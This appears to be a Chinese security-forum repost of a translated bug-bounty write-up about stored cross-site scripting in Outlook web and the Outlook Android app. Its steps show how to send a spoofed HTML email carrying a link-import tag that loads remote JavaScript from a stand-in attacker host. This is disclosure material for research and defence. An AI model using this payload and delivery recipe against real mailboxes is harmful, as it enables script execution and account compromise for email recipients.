用户
搜索
  • TA的每日心情
    擦汗
    2019-1-31 10:58
  • 签到天数: 2 天

    连续签到: 1 天

    [LV.1]初来乍到

    官方账号

    Rank: 7Rank: 7Rank: 7

    231

    主题

    233

    帖子

    1962

    魔法币
    收听
    0
    粉丝
    1
    注册时间
    2018-12-21

    i春秋认证

    发表于 2019-11-29 17:39:21 01211

    22.jpg

    大家好,这是我第一次写漏洞文章,也是我发现的第一个Outlook漏洞。

    在很多网络消息服务中,例如Gmail、Outlook、Yahoo等,都允许接受并渲染电子邮件中的HTML内容(Content-Type: text/html),但同时也会进行安全限制,只允许AH1img等标签。

    而当我测试Outlook中的安全过滤机制时,发现link标签并不会被过滤。这就让我有机可乘,成功引入了外部JS代码,实现了弹框。

    复现步骤

    1. 进入网站[https://emkei.cz/](https://emkei.cz/),这个网站的能直接设置发送的电子邮件的内容的类型。

    2. 随机往邮件主题、发件人和发件地址填入字符。

    3. 往收件人地址填入你需要测试的电子邮件地址。

    4. Content-Type设定为text/html

    5. 邮件正文填入<link rel=import href=[https://Evilcom/filepayload](https://Evilcom/filepayload)>,点击提交。

    6. 登入收件电子邮箱,点击查看消息,payload就会成功执行!

    以下为PoC视频地址:

    https://youtu.be/khsLfQwy1ik
    

    33.png

    44.png

    55.png

    Android版漏洞

    在第一个漏洞被修复后,我下载了对应的Android版本,尝试使用相同的方法进行攻击。结果发现手机端应用的缺陷更大,直接插入了payload,成功弹框。

    66.png

    77.png

    88.png

    感谢你的阅读!

    本文由白帽汇整理并翻译,不代表白帽汇任何观点和立场:https://nosec.org/home/detail/3230.html
    来源:https://medium.com/@elmrhassel/xss-stored-on-outlook-web-outlook-android-app-ad4bd46b8823
    
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册